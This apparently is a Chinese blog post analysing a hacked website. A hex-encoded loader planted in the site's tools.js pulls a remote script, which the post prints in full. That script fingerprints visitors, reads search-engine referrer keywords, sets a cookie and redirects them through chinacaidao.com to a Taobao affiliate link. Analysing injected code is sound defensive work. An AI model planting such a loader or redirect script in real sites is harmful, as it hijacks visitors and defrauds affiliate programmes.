网站地图    收藏   

主页 > 后端 > 网站安全 >

简单分析一个通过js劫持进行黑帽SEO做淘宝客的案

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 某年、某月、某日,某事、某刻、某分、某秒,某人、某站、某代码的分析起因如下,在某时某刻,某人发过来一站及一段代码,然后求分析目标地址:http://upangu.com/目标代码:script...

某年、某月、某日,某事、某刻、某分、某秒,某人、某站、某代码的分析……
 
起因如下,在某时某刻,某人发过来一站及一段代码,然后求分析……
 
目标地址:http://upangu.com/
 
目标代码:<script src="http://go.90psman.com/js.js"></script>
 
某人提出疑问:这段代码查看源代码是不存在的,但是在chrome的审查元素下能查到,为啥啊?
 
 
 
查看源文件,不存在该段代码
 
 
 
使用浏览器元素审查功能,则存在该代码
 
产生这种问题的原因其实很简单,这是执行页面内部JavaScript 或外部.js 脚本后动态输出、插入的代码,具有该功能的函数有:
 
document.write
document.writeln
tablerowObject.innerHTML
......这是很简单的一个函数,应用很广,这里就不多说了……
 
那么,思路就很清晰了,我们只需要揪出来它藏在哪段脚本里即可……
 
经过一段时间排查(小窍门:由于JavaScript 是从上到下依次执行的,所以重点排查目标代码之上的JavaScript 及Js 文件即可,当然,如果你时间多的话,全部检查一遍也无妨),在首页调用的一个Js 中发现一段可疑代码:
 
首页调用的正常Js 文件:
 
<script type="text/javascript" src="statics/script/tools.js"></script>可疑代码(代码经过格式化):
 
var rs_cd = "3C736372697074207372633D2268747";
rs_cd += "4703A2F2F676F2E393070736D616E2E636";
rs_cd += "F6D2F6A732E6A73223E3C2F7363726970743E";
var rs_ct = "";
for (var i = 0; i < rs_cd.length; i += 2) {
    var rs_ch = parseInt(rs_cd.substring(i, i + 2), 16);
    rs_ct += String.fromCharCode(rs_ch);
}
document.writeln(rs_ct);
 
可疑代码
 
看似加密了,其实解密方法很简单:
 
<script>
var rs_cd = "3C736372697074207372633D2268747";
rs_cd += "4703A2F2F676F2E393070736D616E2E636";
rs_cd += "F6D2F6A732E6A73223E3C2F7363726970743E";
var rs_ct = "";
for (var i = 0; i < rs_cd.length; i += 2) {
    var rs_ch = parseInt(rs_cd.substring(i, i + 2), 16);
    rs_ct += String.fromCharCode(rs_ch);
}
alert(rs_ct);
</script>
 
还原后的代码为:
 
<script src="http://go.90psman.com/js.js"></script>这个所谓的加密只是十六进制表示的字符串而已……
 
至此,分析结果已经很清晰了:
 
1、某人入侵了该站,至少有文件修改权限。
 
2、找到了首页调用的一个Js,并在其不起眼的位置加了一段恶意Js 代码。
 
代码分析完毕,我们再回过头来看看这段Js 代码是干什么的吧……
 
首先下载:http://go.90psman.com/js.js
 
(吐槽:直接打开“go.90psman.com”,居然还伪装成304 错误:Bad Request (Invalid Hostname))
 
从下载的数据包中得知,该文件最后修改时间为:
 
 
 
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2012 06:36:46 GMT
Cache-Control: max-age=864000
Content-Length: 4740
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Aug 2012 14:43:42 GMT
Accept-Ranges: bytes
ETag: "68c2b4b2867ccd1:13c2"
X-Powered-By: ASP.NET
Age: 2
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive也就是北京时间:2012年8月17日(星期五)22时43分42秒,看来这段代码有一段时间没更新了……
 
扯远了,回过头来继续看js.js 内容(代码经过格式化):
 
if ("undefined" == typeof(reObj)) {
    reObj = [];
    reObj.platF = navigator.platform.toString().toLowerCase();
    reObj.appVer = navigator.userAgent;
    reObj.refer = document.referrer;
    reObj.domain = document.domain;
    reObj.appVerStr = reObj.appVer.toLowerCase();
    reObj.win = window;
    reObj.yOs = function() {
        var osInfo = "";
        var fSys = new RegExp("(NT 5.2)|(NT 5.0)", "i");
        var fBrowser = new RegExp("(firefox)|(alexa)", "i");
        try {
            osInfo = reObj.appVer.match(/Windows NT \d.\d/i).toString().toLowerCase();
        } catch(e) {}
        if (fSys.test(osInfo) || fBrowser.test(reObj.appVer) || reObj.platF == "x11" || reObj.platF.indexOf("linux") > -1) return false;
        return true;
    };
    reObj.isIE678 = function() {
        var chkIEReg = new RegExp("(MSIE 8.0)|(MSIE 6.0)|(MSIE 7.0)", "i");
        if (chkIEReg.test(reObj.appVer)) return true;
        return false;
    };
    reObj.noPluginDev = function(notIeCore) {
        if (!notIeCore) return true;
        var regPlugin = new RegExp("(google)|(firefox)", "i");
        try {
            for (i = 0; i < navigator.plugins.length; i++) {
                if (regPlugin.test(navigator.plugins[i].name)) return false;
            }
        } catch(e) {}
        return true;
    };
    reObj.notIE = function() {
        if (window.ActiveXObject) return false;
        return true;
    };
    reObj.tRefer = function() {
        var goRefers = new RegExp("(www.baidu.c)|(image.baidu.c)|(www.google.c)|(www.soso.c)|(wenwen.soso.c)|(www.sogou.c)|(www.youdao.c)|(cn.bing.c)|(www.yahoo.c)", "i");
        if (goRefers.test(reObj.refer)) return true;
        return false;
    };
    reObj.getQuery = function(name, url) {
        var reg = new RegExp("(^|\\?|&)" + name + "=([^&]*)(\\s|&|$)", "i");
        if (reg.test(url)) return RegExp.$2.replace(/\+/g, " ");
        return "";
    };
    reObj.getReferHost = function() {
        if (reObj.refer) return reObj.refer.split("/")[2];
        return "";
    };
    reObj.getKwd = function() {
        var rf_domain = reObj.getReferHost();
        var qKwd = new RegExp("(www.youdao.c)|(www.google.c)|(www.yahoo.c)|(cn.bing.c)", "i");
        var key = "";
        if (rf_domain == "www.baidu.com" || rf_domain == "image.baidu.com") {
            key = reObj.getQuery("wd", reObj.refer);
            if (key == "") key = reObj.getQuery("word", reObj.refer);
            key = key + "//b";
        } else if (rf_domain == "www.soso.com" || rf_domain == "wenwen.soso.com") {
            key = reObj.getQuery("w", reObj.refer);
            key = key + "//s";
        } else if (rf_domain == "www.sogou.com") {
            key = reObj.getQuery("query", reObj.refer);
            key = key + "//g";
        } else if (qKwd.test(rf_domain)) {
            key = reObj.getQuery("q", reObj.refer);
            key = key + "//o";
        } else {
            key = "";
        }
        return key;
    };
    reObj.getBsKwd = function() {
        var rf_domain = reObj.getReferHost();
        var bsKwd = new RegExp("(www.baidu.c)|(www.soso.c)", "i");
        if (bsKwd.test(rf_domain)) return reObj.getQuery("bs", reObj.refer);
        return "";
    };
    reObj.normalKwd = function(KeyStr, bsKeyStr) {
        var notKwds = new RegExp("(site)|(link)|(domain)|(in)|(www)|(http)|(%22)", "i");
        var keyObj = new RegExp(KeyStr, "i");
        var bskeyObj = new RegExp(bsKeyStr, "i");
        if (KeyStr != "" && bsKeyStr != "") {
            if (notKwds.test(KeyStr + "" + bsKeyStr) || keyObj.test(reObj.domain) || bskeyObj.test(reObj.domain)) {
                return false;
            } else {
                return true;
            }
        } else if (KeyStr != "") {
            if (notKwds.test(KeyStr) || keyObj.test(reObj.domain)) {
                return false;
            } else {
                return true;
            }
        } else return false;
    };
    reObj.wdOpen = function(lochref, isParent) {
        if (isParent) {
            try {
                reObj.win.opener.location = lochref;
            } catch(e) {
                try {
                    reObj.win.opener.navigate(lochref);
                } catch(e2) {
                    try {
                        reObj.win.opener.opener.navigate(lochref);
                    } catch(e3) {}
                }
            }
        } else reObj.win.location.replace(lochref);
    };
    reObj.getcookie = function(sName) {
        var aCookie = document.cookie.split("; ");
        for (var i = 0; i < aCookie.length; i++) {
            var aCrumb = aCookie[i].split("=");
            if (sName == aCrumb[0]) return unescape(aCrumb[1])
        }
        return ""
    };
    reObj.getCkExpires = function(sName) {
        var aCookie = document.cookie.split("; ");
        for (var i = 0; i < aCookie.length; i++) {
            var aCrumb = aCookie[i].split("=");
            if (sName == aCrumb[0]) return unescape(aCrumb[1])
        }
        return ""
    };
    reObj.setcookie = function(sValue) {
        date = new Date();
        date.setDate(date.getDate() + 7);
        document.cookie = "W3LOOSEDTD=" + escape(sValue) + "; expires=" + date.toGMTString() + ";path=/";
    };
    reObj.markGo = function() {
        if (reObj.getcookie("W3LOOSEDTD") == "") return true;
        return false;
    };
    if (reObj.yOs()) {
        var refKwd = reObj.getKwd();
        var whichS;
        if (refKwd == "") {
            whichS = "null";
        } else {
            whichS = refKwd.split("//")[1];
            refKwd = refKwd.split("//")[0];
        }
        var refBsKwd = reObj.getBsKwd();
        if (reObj.tRefer()) {
            if (reObj.normalKwd(refKwd, refBsKwd)) {
                if (reObj.markGo()) {
                    var notIeCore = reObj.notIE();
                    if (reObj.noPluginDev(notIeCore)) {
                        reObj.setcookie("ECIHOOOCADGFBNLABBEFMIIG");
                        var ggUrl = "http://compatible.googlecode.com/svn/branches/navigator.html?q=";
                        if (notIeCore) reObj.wdOpen(ggUrl + refKwd, notIeCore);
                        else if (reObj.isIE678()) reObj.wdOpen("http://chinacaidao.com/301.asp?s=" + whichS + "&b=" + encodeURIComponent(refBsKwd) + "&q=" + encodeURIComponent(refKwd), notIeCore);
                        else reObj.wdOpen(ggUrl + refKwd, notIeCore);
                    }
                }
            }
        }
    }
    reObj.setcookie("ECIHOOOCADGFBNLABBEFMIIG");
}大略的看了一下代码,代码很简单,判断用户来路,如果符合条件则植入Cookie + 跳转,简单地说,就是最近很流行的某种黑帽SEO 方法。
 
方法就不介绍了,可以翻翻本站以前的文章,有详细讲过……
 
现在看看它跳转到哪里去了,我们来构造Url 地址:
 
格式:
 
http://chinacaidao.com/301.asp?s=关键词&b=前一个关键词&q=关键词
 
(提示:以上关键词均提取自来路地址)
 
例子:
 
http://chinacaidao.com/301.asp?s=核总到此一游&b=核总再次一游&q=核总三顾茅庐
 
访问该地址后,302(Moved Temporarily)跳转到:
 
 





 
Url 地址:
 
http://s8.taobao.com/search?q=茅庐&commend=all&pid=mm_32507042_3273379_10698017
 
分析Url,看到“pid”木有?呵呵,taobao + pid = ?,你懂、我懂、大家都懂……
 
它就是:狗血的淘宝客……(不知道什么是淘宝客的同学,可以自己去查查)
 
再看关键词“茅庐”,这和之前提交的关键词存在关联,提交之后,会自动跳转到淘宝搜索页面(淘宝客返利)……
 
(提示:如果直接访问http://chinacaidao.com/301.asp 不提交任何关键词,那么会使用默认关键词“保健品”)
 
至此,这个个流程已经很清晰了,整个流程,都是地地道道的利用黑帽SEO做淘宝客,具体的不多说,这行大家都懂……
 
(PS:淘宝客做得好的话,利润还是相当高的,比黑产还疯狂……)
 
最后,对该“黑客”进行总体评价:
 
隐藏方法:★★★★★★★★☆☆
 
隐藏位置:★★★★★☆☆☆☆☆
 
加密方案:★★☆☆☆☆☆☆☆☆
 
编程功力:★★★★★★☆☆☆☆
 
盈利方案:★★★★★★★☆☆☆
 
总体评价:★★★★★★★☆☆☆
 
最后,从各个角度加以分析后,得出一个结论,该“黑客”为专业黑帽SEO,并非普通做关键词的小喽罗。
 
可惜,在更专业的黑客面前,一切都是浮云……

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论